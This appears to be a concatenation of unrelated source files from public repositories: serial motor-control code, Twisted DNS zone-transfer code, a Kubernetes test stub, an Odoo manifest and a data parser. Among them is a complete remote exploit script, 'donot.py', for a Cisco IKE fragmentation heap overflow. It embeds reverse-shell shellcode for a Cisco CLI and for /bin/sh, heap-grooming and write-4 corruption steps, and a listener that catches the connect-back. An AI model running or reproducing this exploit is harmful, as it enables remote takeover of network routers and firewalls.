return cmd_bytes
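# Worked example: cmd_data_to_bytes(1000) == [232, 3, 0, 0] (little-endian,
# LSB first); negative values are first wrapped modulo 256**4.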
def init_connection(port='COM5', verbose=True):
# Open serial port
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print 'Error opening serial port. Quitting.'
return sys.exit(0)
if verbose:
print "Opening " + ser.portstr
# Renumber devices
instruction = [0, 2, 0, 0, 0, 0] # All devices renumber (must be done if a
# new device was added or removed from the
# daisy chain)
if verbose:
print "Sending renumbering instruction: ", instruction
send(instruction, ser)
time.sleep(1)
return ser
def move(ser, x_dist=0, y_dist=0, verbose=False):
"""
Move the stage a relative distance specified by x_dist and y_dist.
    Parameters
    ----------
    ser : serial.Serial, open serial port
    x_dist : distance to move in microns
    y_dist : distance to move in microns
    verbose : print communication with devices
    TODO:
    set max relative move (cmd 46)
"""
x_step = 0
y_step = 0
# If x/y_dist is positive then max_x/y_step will be positive, if x/y_dist
# is negative then max_x/y_step will be negative.
if x_dist != 0:
max_x_step = 500 * x_dist/abs(x_dist)
if y_dist !=0:
max_y_step = 500 * y_dist/abs(y_dist)
while abs(x_dist) > 0:
if (abs(max_x_step) - abs(x_dist)) < 0:
x_step = max_x_step
x_dist = x_dist - max_x_step
else:
x_step = x_dist
x_dist = 0
instruction = [1, 21]
# From microns to microsteps
instruction.extend(cmd_data_to_bytes(microns_to_microsteps(x_step)))
send(instruction, ser)
time.sleep(10.0 * x_step/max_x_step)
if verbose:
try:
reply = receive(ser)
print 'Instruction sent: ', instruction
print 'Device number: ', reply[0]
print 'Command number: ', reply[1]
print 'Supply voltage: ', reply[2]/10.0, 'V'
print 'Data: ', reply_bytes_to_data( reply )
except:
print "No reply was received."
while abs(y_dist) > 0:
if (abs(max_y_step) - abs(y_dist)) < 0:
y_step = max_y_step
y_dist = y_dist - max_y_step
else:
y_step = y_dist
y_dist = 0
instruction = [2, 21]
# From microns to microsteps
instruction.extend(cmd_data_to_bytes(microns_to_microsteps(y_step)))
send(instruction, ser)
time.sleep(10.0 * y_step/max_y_step)
if verbose:
try:
### command number 255: ERROR!
reply = receive(ser)
print 'Instruction sent: ', instruction
print 'Device number: ', reply[0]
print 'Command number: ', reply[1]
print 'Supply voltage: ', reply[2]/10.0, 'V'
print 'Data: ', reply_bytes_to_data(reply)
except:
print "No reply was received."
def solitary_move(x_dist=0, y_dist=0, verbose=False, port='COM5'):
"""
    Open the port, move the stage a relative distance specified by x_dist and
    y_dist, then close the port.
    Parameters
    ----------
    x_dist : distance to move in microns
    y_dist : distance to move in microns
    verbose : print communication with devices
    port : { string, default: 'COM5' (linux: '/dev/ttyUSB0') }
    TODO:
    set max relative move (cmd 46)
"""
# open serial port
# replace "/dev/ttyUSB0" with "COM1", "COM2", etc in Windows
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print "Error opening serial port. Quitting."
return sys.exit(0)
print "Opened " + ser.portstr
move(ser, x_dist, y_dist)
print "Closing " + ser.portstr
ser.close()
def test(port='COM5', instruction=[1, 52, 0, 0, 0, 0]):
"""
Tests communication with T-MCA Stepper Motor Controllers
Parameters
----------
    port : { string, default: 'COM5' (linux: '/dev/ttyUSB0') }
"""
# open serial port
# replace "/dev/ttyUSB0" with "COM1", "COM2", etc in Windows
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print "Error opening serial port. Quitting."
return sys.exit(0)
print "Opening " + ser.portstr
# Byte 1 - Device number
# Byte 2 - Command number
# Byte 3 - Data - Least Significant Byte (LSB)
# Byte 4 - Data
# Byte 5 - Data
# Byte 6 - Data - Most Significant Byte (MSB)
#instruction = [1,21,20,0,0,0] # move 1st motor 20 steps
#instruction = [1,52,0,0,0,0] # return power supply voltage
#instruction = [0,2,0,0,0,0] # All devices renumber (must
# be done if a new device was
# added or removed from the
# daisy chain)
print "Sending instruction", instruction
send(instruction, ser)
time.sleep(1) # wait for 1 second
try:
reply = receive(ser)
print "Receiving reply", reply
print "Device number:", reply[0]
print "Command number:", reply[1]
print "Supply voltage:", reply[2]/10.0, "V"
print 'Data: ', reply_bytes_to_data(reply)
except:
print "No reply was received."
print "Closing " + ser.portstr
ser.close()
| kalleknast/GU_scan | tmca_control.py | Python | mit | 10,007 |
# -*- test-case-name: twisted.names.test.test_names -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import absolute_import, division
__all__ = ['SecondaryAuthority', 'SecondaryAuthorityService']
from twisted.internet import task, defer
from twisted.names import dns
from twisted.names import common
from twisted.names import client
from twisted.names import resolve
from twisted.names.authority import FileAuthority
from twisted.python import log, failure
from twisted.application import service
class SecondaryAuthorityService(service.Service):
calls = None
_port = 53
def __init__(self, primary, domains):
"""
@param primary: The IP address of the server from which to perform
zone transfers.
@type primary: L{str}
@param domains: A sequence of domain names for which to perform
zone transfers.
@type domains: L{list} of L{bytes}
"""
self.primary = primary
self.domains = [SecondaryAuthority(primary, d) for d in domains]
@classmethod
def fromServerAddressAndDomains(cls, serverAddress, domains):
"""
Construct a new L{SecondaryAuthorityService} from a tuple giving a
        server address and a sequence of C{bytes} giving the names of the
        domains for which this is an authority.
@param serverAddress: A two-tuple, the first element of which is a
C{str} giving an IP address and the second element of which is a
C{int} giving a port number. Together, these define where zone
transfers will be attempted from.
        @param domains: A sequence of C{bytes} giving the domains to transfer.
@return: A new instance of L{SecondaryAuthorityService}.
"""
service = cls(None, [])
service.primary = serverAddress[0]
service._port = serverAddress[1]
service.domains = [
SecondaryAuthority.fromServerAddressAndDomain(serverAddress, d)
for d in domains]
return service
def getAuthority(self):
return resolve.ResolverChain(self.domains)
def startService(self):
service.Service.startService(self)
self.calls = [task.LoopingCall(d.transfer) for d in self.domains]
i = 0
from twisted.internet import reactor
for c in self.calls:
# XXX Add errbacks, respect proper timeouts
reactor.callLater(i, c.start, 60 * 60)
i += 1
def stopService(self):
service.Service.stopService(self)
for c in self.calls:
c.stop()
class SecondaryAuthority(FileAuthority):
"""
An Authority that keeps itself updated by performing zone transfers.
@ivar primary: The IP address of the server from which zone transfers will
be attempted.
@type primary: C{str}
@ivar _port: The port number of the server from which zone transfers will be
attempted.
@type: C{int}
@ivar _reactor: The reactor to use to perform the zone transfers, or L{None}
to use the global reactor.
"""
transferring = False
soa = records = None
_port = 53
_reactor = None
def __init__(self, primaryIP, domain):
"""
@param domain: The domain for which this will be the secondary
authority.
@type domain: L{bytes}
"""
# Yep. Skip over FileAuthority.__init__. This is a hack until we have
# a good composition-based API for the complicated DNS record lookup
# logic we want to share.
common.ResolverBase.__init__(self)
self.primary = primaryIP
self.domain = domain
@classmethod
def fromServerAddressAndDomain(cls, serverAddress, domain):
"""
Construct a new L{SecondaryAuthority} from a tuple giving a server
address and a C{bytes} giving the name of a domain for which this is an
authority.
@param serverAddress: A two-tuple, the first element of which is a
C{str} giving an IP address and the second element of which is a
C{int} giving a port number. Together, these define where zone
transfers will be attempted from.
@param domain: A C{bytes} giving the domain to transfer.
@return: A new instance of L{SecondaryAuthority}.
"""
secondary = cls(None, None)
secondary.primary = serverAddress[0]
secondary._port = serverAddress[1]
secondary.domain = domain
return secondary
def transfer(self):
if self.transferring:
return
        self.transferring = True
reactor = self._reactor
if reactor is None:
from twisted.internet import reactor
resolver = client.Resolver(
servers=[(self.primary, self._port)], reactor=reactor)
return resolver.lookupZone(self.domain
).addCallback(self._cbZone
).addErrback(self._ebZone
)
def _lookup(self, name, cls, type, timeout=None):
if not self.soa or not self.records:
return defer.fail(failure.Failure(dns.DomainError(name)))
return FileAuthority._lookup(self, name, cls, type, timeout)
def _cbZone(self, zone):
ans, _, _ = zone
self.records = r = {}
for rec in ans:
if not self.soa and rec.type == dns.SOA:
self.soa = (str(rec.name).lower(), rec.payload)
else:
r.setdefault(str(rec.name).lower(), []).append(rec.payload)
def _ebZone(self, failure):
log.msg("Updating %s from %s failed during zone transfer" % (self.domain, self.primary))
log.err(failure)
def update(self):
self.transfer().addCallbacks(self._cbTransferred, self._ebTransferred)
def _cbTransferred(self, result):
self.transferring = False
def _ebTransferred(self, failure):
        self.transferring = False
log.msg("Transferring %s from %s failed after zone transfer" % (self.domain, self.primary))
log.err(failure)
| EricMuller/mynotes-backend | requirements/twisted/Twisted-17.1.0/src/twisted/names/secondary.py | Python | mit | 6,085 |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.batch_api import BatchApi
class TestBatchApi(unittest.TestCase):
""" BatchApi unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.batch_api.BatchApi()
def tearDown(self):
pass
def test_get_api_group(self):
"""
Test case for get_api_group
"""
pass
if __name__ == '__main__':
unittest.main()
| djkonro/client-python | kubernetes/test/test_batch_api.py | Python | apache-2.0 | 830 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
{
"name": "Export Customers - Exporting customer's data in .csv file for italian fiscal program.",
'version': '2.0.1.0',
'category': 'Generic Modules/Sales customers',
"description": """Exporting customer's data in .csv file """,
"author": "Didotech SRL",
'website': 'http://www.didotech.com',
"depends": [
"base",
"base_partner_ref",
"sale",
"account",
#"l10n_it",
"l10n_it_base",
"l10n_it_account"
],
"init_xml": [],
"update_xml": [
"security/security.xml",
"export_customers.xml"
],
"demo_xml": [],
"installable": True,
"active": False,
}
| iw3hxn/LibrERP | export_customers/__openerp__.py | Python | agpl-3.0 | 2,043 |
import numpy as np
import h5py
# value is a list
# converts anything numeric into a float
def processMetadataValue(value):
if len(value) < 2:
return ''
try:
return float(value[1])
except ValueError:
return value[1]
# a function to parse txtXY files
# will parse files with or without metadata
# probably pretty inefficient, but easy to read :)
def parseTxtXY(filename):
with open(filename, "r") as file:
rawdata=file.readlines()
# strip all whitespace except tabs
rawdata = [s.replace(" ", "") for s in rawdata]
# get metadata fields
        # include '9' as well: range() excludes its stop value
        splitNumeric = [s.split('\t') for s in rawdata if s[0] == '-' or ord(s[0]) in range(ord('0'), ord('9') + 1)]
splitMetadata = [s[1:].replace("\n", "").split(':') for s in rawdata if s[0] == '$']
data = np.asarray(splitNumeric).astype(np.double)
metadataKeys = [line[0] for line in splitMetadata]
metadataValues = [processMetadataValue(line) for line in splitMetadata]
metadata = dict(zip(metadataKeys, metadataValues))
return {'data': data, 'metadata': metadata}
# will save a sample file, assuming that the first row is x and subsequent rows are Y
# numData is numpy array, metadata is dictionary
def saveSampleFile(filename, numData, metadata):
# clean metadata of empty entries:
metadata = {key: value for key, value in metadata.items() if value != ''}
with h5py.File(filename, 'w') as outfile:
outfile.create_dataset('x', data=numData[:, 0].astype(np.double)[:, None])
outfile.create_dataset('Y', data=numData[:, 1:].astype(np.double))
for key, value in metadata.items():
if isinstance(value, str):
outfile.attrs[key] = np.string_(value)
else:
outfile.attrs[key] = value
| BiRG/Omics-Dashboard | compute-images/spectra-processing/src/textparsers.py | Python | mit | 1,831 |
#!/usr/bin/env python2.7
import socket
import sys
import struct
import string
import random
import time
# Spawns a reverse cisco CLI
cliShellcode = (
"\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"
"\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"
"\x8b\x40\x04\x8d\x98\xd8\x00\x00\x00\x58\x81\x3b\xd0\xd4\x00\xe1"
"\x75\xe4\x83\x7b\x04\x31\x74\xde\x89\xd8\x2d\x00\x01\x00\x00\xc7"
"\x40\x04\x03\x01\x00\x00\xc7\x40\x0c\xd0\x00\x00\x00\xc7\x80\xf8"
"\x00\x00\x00\xef\xcd\x1c\xa1\x55\x31\xed\x31\xff\x4f\xbe\x22\x00"
"\x00\x00\xba\x07\x00\x00\x00\xb9\x00\x10\x00\x00\x31\xdb\xb8\xc0"
"\x00\x00\x00\xcd\x80\x5d\x89\xc7\xeb\x26\x5e\xb9\x00\x04\x00\x00"
"\xf3\xa5\x31\xdb\x6a\x03\x68\x00\x20\x00\x00\x53\x50\x68\xfd\xa8"
"\xff\x09\xb8\xf0\xb7\x06\x08\xff\xd0\x83\xc4\x14\x61\x31\xc0\xc3"
"\xe8\xd5\xff\xff\xff\x55\x89\xe5\x81\xec\x10\x04\x00\x00\xe9\xb1"
"\x00\x00\x00\x58\x89\x85\xfc\xfb\xff\xff\x50\xb8\xf0\x07\x07\x08"
"\xff\xd0\x83\xc4\x04\x89\x85\xf8\xfb\xff\xff\x89\xc3\x8b\x43\x04"
"\x68\x80\xee\x36\x00\x68\x1a\x90\x01\x00\x53\xff\x50\x70\xc7\x44"
"\x24\x04\x20\x90\x01\x00\x8b\x43\x04\xff\x50\x70\xc7\x85\xf4\xfb"
"\xff\xff\x00\x40\x00\x00\x8d\x8d\xf4\xfb\xff\xff\x89\x4c\x24\x08"
"\xc7\x44\x24\x04\x21\x90\x01\x00\x89\x1c\x24\x8b\x43\x04\xff\x50"
"\x70\xbe\xc8\xef\xff\xff\x65\x8b\x06\x89\x98\x98\x00\x00\x00\xeb"
"\x3a\xb8\x80\x0a\x0f\x08\xff\xd0\x5b\xc7\x43\x0c\xff\xff\xff\x17"
"\x83\xc3\x14\xc7\x03\x65\x6e\x61\x62\xc7\x43\x04\x6c\x65\x5f\x31"
"\xc7\x43\x08\x35\x00\x00\x00\x6a\x04\x68\x60\xc1\x52\x0a\xb8\x20"
"\x68\x0f\x08\xff\xd0\x89\xec\x5d\x31\xc0\xc3\xe8\xc1\xff\xff\xff"
"\x60\xc1\x52\x0a\xe8\x4a\xff\xff\xfftcp/CONNECT/3/@IP@/@PORT@\x00"
)
# Spawns a reverse "/bin/sh"
shShellcode = (
"\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"
"\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"
"\x8b\x40\x04\x8d\x98\xd8\x00\x00\x00\x58\x81\x3b\xd0\xd4\x00\xe1"
"\x75\xe4\x83\x7b\x04\x31\x74\xde\x89\xd8\x2d\x00\x01\x00\x00\xc7"
"\x40\x04\x03\x01\x00\x00\xc7\x40\x0c\xd0\x00\x00\x00\xc7\x80\xf8"
"\x00\x00\x00\xef\xcd\x1c\xa1\xb8\x40\xbc\x2a\x09\xff\xd0\x61\xb8"
"\x02\x00\x00\x00\xcd\x80\x85\xc0\x0f\x85\xa1\x01\x00\x00\xba\xed"
"\x01\x00\x00\xb9\xc2\x00\x00\x00\x68\x2f\x73\x68\x00\x68\x2f\x74"
"\x6d\x70\x8d\x1c\x24\xb8\x05\x00\x00\x00\xcd\x80\x50\xeb\x31\x59"
"\x8b\x11\x8d\x49\x04\x89\xc3\xb8\x04\x00\x00\x00\xcd\x80\x5b\xb8"
"\x06\x00\x00\x00\xcd\x80\x8d\x1c\x24\x31\xd2\x52\x53\x8d\x0c\x24"
"\xb8\x0b\x00\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80"
"\xe8\xca\xff\xff\xff\x46\x01\x00\x00\x7f\x45\x4c\x46\x01\x01\x01"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00"
"\x00\x54\x80\x04\x08\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x34\x00\x20\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xf2\x00\x00"
"\x00\xf2\x00\x00\x00\x07\x00\x00\x00\x00\x10\x00\x00\x55\x89\xe5"
"\x83\xec\x10\x6a\x00\x6a\x01\x6a\x02\x8d\x0c\x24\xbb\x01\x00\x00"
"\x00\xb8\x66\x00\x00\x00\xcd\x80\x83\xc4\x0c\x89\x45\xfc\x68\x7f"
"\x00\x00\x01\x68\x02\x00\x04\x38\x8d\x14\x24\x6a\x10\x52\x50\x8d"
"\x0c\x24\xbb\x03\x00\x00\x00\xb8\x66\x00\x00\x00\xcd\x80\x83\xc4"
"\x14\x85\xc0\x7d\x18\x6a\x00\x6a\x01\x8d\x1c\x24\x31\xc9\xb8\xa2"
"\x00\x00\x00\xcd\x80\x83\xc4\x08\xeb\xc4\x8b\x45\xfc\x83\xec\x20"
"\x8d\x0c\x24\xba\x03\x00\x00\x00\x8b\x5d\xfc\xc7\x01\x05\x01\x00"
"\x00\xb8\x04\x00\x00\x00\xcd\x80\xba\x04\x00\x00\x00\xb8\x03\x00"
"\x00\x00\xcd\x80\xc7\x01\x05\x01\x00\x01\xc7\x41\x04\x0a\x64\x00"
"\x01\x66\xc7\x41\x08\x11\x5c\xba\x0a\x00\x00\x00\xb8\x04\x00\x00"
"\x00\xcd\x80\xba\x20\x00\x00\x00\xb8\x03\x00\x00\x00\xcd\x80\x83"
"\xc4\x20\x8b\x5d\xfc\xb9\x02\x00\x00\x00\xb8\x3f\x00\x00\x00\xcd"
"\x80\x49\x7d\xf6\x31\xd2\x68\x2d\x69\x00\x00\x89\xe7\x68\x2f\x73"
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x8d\x0c\x24\xb8"
"\x0b\x00\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80\x31"
"\xc0\xc3"
)
# SA Session
class Session(object):
def __init__(self, host_port, id = None):
if id == None:
id = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
self._host, self._port = host_port
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._id = id
self._mid = 1
# Init session
print("[+] Using session ID: " + self._id)
self.send(self.make_SA())
# Check if we got something
res = self.recv()
cookie = res[8:16]
print("[+] Cookie: " + cookie)
self._cookie = cookie
# Enforce value of 0x21
if ord(res[16]) != 0x21:
raise Exception("Invalid router response")
print("[+] New SA successfuly created.")
# UPD socket helpers
def send(self, buf):
self._sock.sendto(buf, (self._host, self._port))
def recv(self, size = 4096):
data, addr = self._sock.recvfrom(size)
return data
def make_SA(self):
buf = ""
buf += self._id # Initiator SPI
buf += "\x00"*8 # Responder SPI
buf += "\x21" # next payload (security association)
buf += "\x20" # version
buf += "\x22" # exchange type
buf += "\x08" # flags
buf += "\x00"*4 # message ID
buf += "$$$$" # length
# stolen from pcap
# THIS IS SECURITY ASSOCIATION
buf += "\x22\x00\x00\x6c\x00\x00\x00\x68\x01\x01\x00\x0b\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x01\x00\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x01\x00\x00\x03\x03\x00\x00\x08\x01\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x01\x03\x00\x00\x08\x03\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x01\x03\x00\x00\x08\x04\x00\x00\x02\x03\x00\x00\x08\x04\x00\x00\x05\x00\x00\x00\x08\x04\x00\x00\x0e"
# THIS IS KEY EXCHANGE
# this is the type of the next payload...
buf += "\x28" # 0x28 = Nonce, 0x2b = vendor ID
# KEY EXCHANGE DATA
buf += "\x00\x00\x88\x00\x02\x00\x00\x50\xea\xf4\x54\x1c\x61\x24\x1b\x59\x3f\x48\xcb\x12\x8c\xf1\x7f\x5f\xd4\xd8\xe9\xe2\xfd\x3c\x66\x70\xef\x08\xf6\x56\xcd\x83\x16\x65\xc1\xdf\x1c\x2b\xb1\xc4\x92\xca\xcb\xd2\x68\x83\x8e\x2f\x12\x94\x12\x48\xec\x78\x4b\x5d\xf3\x57\x87\x36\x1b\xba\x5b\x34\x6e\xec\x7e\x39\xc1\xc2\x2d\xf9\x77\xcc\x19\x39\x25\x64\xeb\xb7\x85\x5b\x16\xfc\x2c\x58\x56\x11\xfe\x49\x71\x32\xe9\xe8\x2d\x27\xbe\x78\x71\x97\x7a\x74\x42\x30\x56\x62\xa2\x99\x9c\x56\x0f\xfe\xd0\xa2\xe6\x8f\x72\x5f\xc3\x87\x4c\x7c\x9b\xa9\x80\xf1\x97\x57\x92"
# this is the Nonce payload
buf += "\x2b"
buf += "\x00\x00\x18\x97\x40\x6a\x31\x04\x4d\x3f\x7d\xea\x84\x80\xe9\xc8\x41\x5f\x84\x49\xd3\x8c\xee"
# lets try a vendor id or three
buf += "\x2b" # next payload, more vendor ID
buf += "\x00" # critical bit
vid = "CISCO-DELETE-REASON"
buf += struct.pack(">H", len(vid)+4)
buf += vid
# another vendor id
buf += "\x2b" # next payload, more vendor ID
buf += "\x00" # critical bit
vid = "CISCO(COPYRIGHT)&Copyright (c) 2009 Cisco Systems, Inc."
buf += struct.pack(">H", len(vid)+4)
buf += vid
# another vendor id
buf += "\x2b" # next payload, more vid
buf += "\x00" # crit
vid = "CISCO-GRE-MODE"
buf += struct.pack(">H", len(vid)+4)
buf += vid
# last vendor id
buf += "\x00" # next payload
buf += "\x00"
vid = "\x40\x48\xb7\xd5\x6e\xbc\xe8\x85\x25\xe7\xde\x7f\x00\xd6\xc2\xd3"
buf += struct.pack(">H", len(vid)+4)
buf += vid
return buf.replace("$$$$", struct.pack(">L", len(buf)))
def make_cisco_fragment(self, flength, seqno, fragid, lastfrag, sploit):
buf = ''
buf += self._id # Initiator SPI (random)
buf += self._cookie # Responder SPI
buf += "\x84" # next payload
buf += "\x20" # version
buf += "\x25" # exchange type (2=identify protection)
buf += "\x08" # flags
buf += "\x00\x00\x00\x01" # message ID
buf += "ABCD" # length
# PAYLOAD
payload = ""
payload += "\x00" # next payload (none)
payload += "\x00" # critical bit
payload += struct.pack(">H", flength) #payload_len) # length
payload += struct.pack(">H", fragid) # frag ID
payload += struct.pack("B", seqno) # frag sequence
payload += struct.pack("B", lastfrag)
payload += sploit
buf += payload
return buf.replace("ABCD", struct.pack(">L", len(buf)))
def send_fragment(self, flength, seqno, fragid, lastfrag, sploit):
buf = self.make_cisco_fragment(flength, seqno, fragid, lastfrag, sploit)
self.send(buf)
# We're not supposed to receive anything if everything went
# according to plan
def make_cisco_option_list(self, opt_lst):
buf = ''
buf += self._id # Initiator SPI (random)
buf += self._cookie # Responder SPI
buf += "\x2f" # next payload
buf += "\x20" # version
buf += "\x25" # exchange type (2=identify protection)
buf += "\x08" # flags
buf += struct.pack(">I", 1) # message ID
buf += "ABCD" # length
# PAYLOAD
payload = ""
payload += "\x00" # next payload (none)
payload += "\x00" # critical bit
payload += "EF" #payload_len) # length
payload += "\x03" # CFG_SET
payload += "\x00\x00\x00" # Reserved
total = 0x8
for size, n in opt_lst:
option = struct.pack(">H", 0x6000) #id
option += struct.pack(">H", size) # data length
option += "A" * (size)
total += (size + 4) * n
payload += option * n
buf += payload
packet = buf.replace("ABCD", struct.pack(">L", len(buf))).replace("EF", struct.pack(">H", total))
return packet
class Exploit(object):
def __init__(self, host, revHost, revPort = 4444):
self._host = host
self._port = 500
self._revHost = revHost
self._revPort = revPort
self._sessions = []
# Create a new SA session
def create_SA(self, id = None):
# Create a new socket for session
sess = Session((self._host, self._port), id)
# Append to session list
self._sessions.append(sess)
return sess
# Interact with reverse shell
def interact(self):
from telnetlib import Telnet
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._revHost, self._revPort))
s.listen(5)
cli = s.accept()[0]
s.close()
print("[+] Got connect-back")
t = Telnet()
t.sock = cli
t.interact()
def buildPayload(self, cli = False):
if cli == False:
buf = bytearray(shShellcode)
# Adjust IP and port
buf[0x1ad:0x1b1] = socket.inet_aton(self._revHost)
buf[0x1b5:0x1b7] = struct.pack(">H", self._revPort)
Shellcode = bytes(buf)
else:
Shellcode = cliShellcode.replace("@IP@", self._revHost).replace("@PORT@", str(self._revPort))
return Shellcode
if __name__ == "__main__":
if len(sys.argv) < 3:
print("[+] Usage: {0:s} <cisco IP> <attacker IP>[:port]".format(sys.argv[0]))
sys.exit(0)
#TODO: Check host
host = sys.argv[1]
revHost = sys.argv[2]
# Parse revHost
port = 4444
if revHost.rfind(":") != -1:
revHost, port = revHost.split(":")
port = int(port)
exploit = Exploit(host, revHost, port)
sess1 = exploit.create_SA()
sess2 = exploit.create_SA()
n = 0xd6
sess2.send_fragment(0x8 + n + 3, 1, 5, 0, "A" * (n + 3))
# Send packets which will trigger the vulnerability
# Weird packet to get a size of 0x1
sess2.send_fragment(8 + -7, 0, 6, 1, "A" * (256 - 7))
# This fragment will be the one being copied
# during the memory corruption
buf = "A" * (n - 0xd + 0x3)
buf += struct.pack("<I", 0xef000000)
buf += struct.pack("<I", 0x00a11ccd) # chunk magics
buf += struct.pack("<I", 0xe100d4d0)
buf += struct.pack("B", 0x61) # set size from 0x31 to 0x61 in order to encompass the
# adjacent chunk on free
sess2.send_fragment(8 + n + 3, 1, 6, 0, buf)
sess1.send_fragment(0x8 + 0xf8, 1, 0xeb, 0, "A" * 0xf8)
pkt = sess1.make_cisco_option_list((
(0xd0, 0x30),
)
)
# Defragment heap
sess1.send(pkt)
sess1.send(pkt)
sess1.send(pkt)
# Prepare a fake chunk
buf = ""
buf += struct.pack("<I", 0x60)
buf += struct.pack("<I", 0x102)
buf += struct.pack("<I", 0xa11c0123)
buf += struct.pack("<I", 0xe0)
buf += "A" * 0xe8
# And allocate it right after a 0x100 bytes hole
sess1.send_fragment(0x8 + 0xf8, 2, 0xeb, 0, buf)
# Trigger the overflow
sess2.send_fragment(8 + -7, 3, 6, 1, "A" * (256 - 7))
    # Retrieve the fake freed block
#buf = "\xcc" * (0xd0 - len(buf))
buf = "\x00" * 0xd0
buf += struct.pack("<I", 0xe100d4d0)
buf += struct.pack("<I", 0x31)
# this is a special writable address in the process
# it translate into the following executable code:
# nop / jmp [ecx]
# since ecx happens to hold a pointer to a controlled buffer
# the execution flow will be redirected to attacker controlled data
what = 0xc821ff90
# Just some writable address in the process which doesn't seem to be used
where = 0xc8002000 - 0x8
buf += struct.pack("<I", what)
buf += struct.pack("<I", where)
buf += struct.pack("<I", 0xf3ee0123)
buf += struct.pack("<I", 0x0) * 5
buf += struct.pack("<I", 0x5ee33210)
buf += struct.pack("<I", 0xf3eecdef)
buf += struct.pack("<I", 0x30)
buf += struct.pack("<I", 0x132)
buf += struct.pack("<I", 0xa11c0123)
buf += struct.pack("<I", 0x100)
buf += struct.pack("<I", 0x0) * 2
# Second write-4 pointers
# This is the address of the pointer to the "list_add" function
# which will give us control of execution flow
where = 0x0A99B7A4 - 0x10
# This is the address where the opcode sequence "nop / jmp [ecx]" is located
what = 0xc8002000
buf += struct.pack("<I", what)
buf += struct.pack("<I", where)
buf += "\x00" * (0x128 - len(buf))
# Try to chain a config list and a fragment packet
packet = bytearray()
packet += sess1._id # Initiator SPI (random)
packet += sess1._cookie # Responder SPI
packet += "\x2f" # next payload option list
packet += "\x20" # version
packet += "\x25" # exchange type (2=identify protection)
packet += "\x08" # flags
packet += struct.pack(">I", 1) # message ID
packet += "XXXX" # total length including header
payload = bytearray()
payload += "\x00" # next payload (frag)
payload += "\x00" # critical bit
payload += "\x00\x00" # payload length
payload += "\x03" # CFG_SET
payload += "\x00\x00\x00" # Reserved
size = 0x130
option = struct.pack(">H", 0x8400) #id
option += struct.pack(">H", size) # data length
option += "\x90" * 0x8 + buf
payload += option * 0x10
# Update payload length
payload[2:4] = struct.pack(">H", len(payload))
packet += payload
# Update payload length
packet[0x18:0x1C] = struct.pack(">I", len(packet))
packet = bytes(packet)
# Reallocate the fake freed 0x130 bytes chunk with controlled data
# this way we can perform a write-4 memory corruption when freeing
# the subsequent memory
sess1.send(packet)
time.sleep(0.2)
#raw_input()
packet = bytearray()
packet += sess1._id # Initiator SPI (random)
packet += sess1._cookie # Responder SPI
packet += "\x84" # next payload option list
packet += "\x20" # version
packet += "\x25" # exchange type (2=identify protection)
packet += "\x08" # flags
packet += struct.pack(">I", 1) # message ID
packet += "XXXX" # total length including header
buf = exploit.buildPayload(cli = True)
flength = len(buf) + 0x8
fragid = 0xeb
seqno = 0x5
lastfrag = 0
payload = bytearray()
# Jump over garbage directly into shellcode (interpreted as jmp +0x6)
payload += "\xeb" # next payload (none)
payload += "\x06" # critical bit
payload += struct.pack(">H", flength) #payload_len) # length
payload += struct.pack(">H", fragid) # frag ID
payload += struct.pack("B", seqno) # frag sequence
payload += struct.pack("B", lastfrag)
payload += buf
packet += payload
# Update payload length
packet[0x18:0x1C] = struct.pack(">I", len(packet))
packet = bytes(packet)
# Trigger the 2 write-4 and get code execution
sess1.send(packet)
# Hopefully we'll get something interesting
exploit.interact()
| pesaply/sarafu | donot.py | Python | mit | 18,176 |
'''
Created on Apr 2, 2012
